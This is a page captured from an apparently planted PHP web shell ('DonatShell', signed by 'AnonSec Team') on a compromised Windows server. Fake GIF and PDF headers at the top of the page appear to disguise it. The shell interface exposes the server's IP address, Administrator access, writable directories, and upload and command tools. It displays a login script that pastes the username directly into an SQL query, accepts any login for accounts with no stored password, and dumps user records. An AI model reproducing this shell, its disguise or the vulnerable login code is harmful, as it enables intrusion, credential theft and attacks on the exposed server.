GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Scheduler/User/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/nginx/html/Scheduler/User/AuthenticateUser_via_Database.phpinc
<?
// User/AuthenticateUser_via_Database.phpinc
t_Begin(d_O());

$DEBUG_AuthenticateUser_via_Database= d_O();
#d_Var("\$_SERVER['REMOTE_ADDR']",$_SERVER['REMOTE_ADDR']);
#if ( $_SERVER['REMOTE_ADDR'] == '10.14.16.25' ) { $DEBUG_AuthenticateUser_via_Database= true; }
if (!isset($DEBUG_AuthenticateUser_via_Database)) { $DEBUG_AuthenticateUser_via_Database= false; }
if ($DEBUG_AuthenticateUser_via_Database) {
	ini_set('display_errors',true);
	error_reporting(E_ALL | E_STRICT);
	echo "<b>".basename(__FILE__).":".__LINE__."</b> ";
	echo __FILE__." on ".$_SERVER['HTTP_HOST']."<br>\n";
}
/**/
$query = "
  SELECT user.*, userdata.*
    FROM `user`
		JOIN `userdata` USING(userId)
    WHERE userUsername = '".$f['username']."'
";
if ($DEBUG_AuthenticateUser_via_Database) { d_Var('userResult',$query,'q'); }
$userResult = query_do($query);
$userCount = $GLOBALS['_QUERY']['count'];
if ($DEBUG_AuthenticateUser_via_Database) { d_Var('$userCount',$userCount,''); }
if ($DEBUG_AuthenticateUser_via_Database) { d_Var('$userResult',$userResult,''); }
$userAuthenticatedResponse = '';
if ( $userCount == 1 ) {
	mysqli_data_seek($userResult, 0);
	$userRow = mysqli_fetch_assoc($userResult);
	d_Var('$userRow',$userRow,'');
	if ( $userRow['userPassword'] ) { // Is there a pw in the db?
		// Yes, verify the passwork is correct.
		if (password_verify($f['password'], $userRow['userPassword'])) {
			//echo 'Password is valid!';
			$loginAuthenticated = true;
			$authenticatedBy = 'database';
		} else {
			//echo 'Invalid password.';
		}
	} else {
		$loginAuthenticated = true;
		$authenticatedBy = 'database';
	} // Is there a pw in the db?
	#d_Var('$userRow',$userRow,'k');
	/** /
	if ( $userRow['userIsStudent'] ) {
		$userRow['userIsStudent'] = '1';
	} else {
		$userRow['userIsStudent'] = '0';
	}
	$userAuthenticatedResponse .= $userRow['userIsStudent'].";";
	$userAuthenticatedResponse .= 'Authenticated by Database';
	/**/
	/** /
	if ($DEBUG_AuthenticateUser_via_Database) {
		echo $f['username'].";";
		echo $userRow['userPasswordMD5'].";";
		echo $userRow['userFirstName'].";";
		echo $userRow['userMiddleName'].";";
		echo $userRow['userLastName'].";";
		echo $userRow['userEmail'].";";
		echo $userRow['userDN'].";";
		echo $userRow['userIsStudent'].";";
		echo "Authenticated by Database<br>\n";
	}
	/**/
} else {
	$userAuthenticatedResponse .= "Not authenticated;";
	$userAuthenticatedResponse .= $f['username'].";";
	$userAuthenticatedResponse .= ";";
	$userAuthenticatedResponse .= ";";
	$userAuthenticatedResponse .= ";";
	$userAuthenticatedResponse .= ";";
	$userAuthenticatedResponse .= ";";
	$userAuthenticatedResponse .= ";";
	$userAuthenticatedResponse .= ";";
	$userAuthenticatedResponse .= ";;";
	$userAuthenticatedResponse .= 'Can\'t authenticate via database';
}
t_End();
/** /
if ($DEBUG_AuthenticateUser_via_Database) {
	d_Var('$userAuthenticatedResponse',$userAuthenticatedResponse,'');
	d_On(); include('common/pageFooter.phpinc');
}
/**/
?>

Anon7 - 2022
AnonSec Team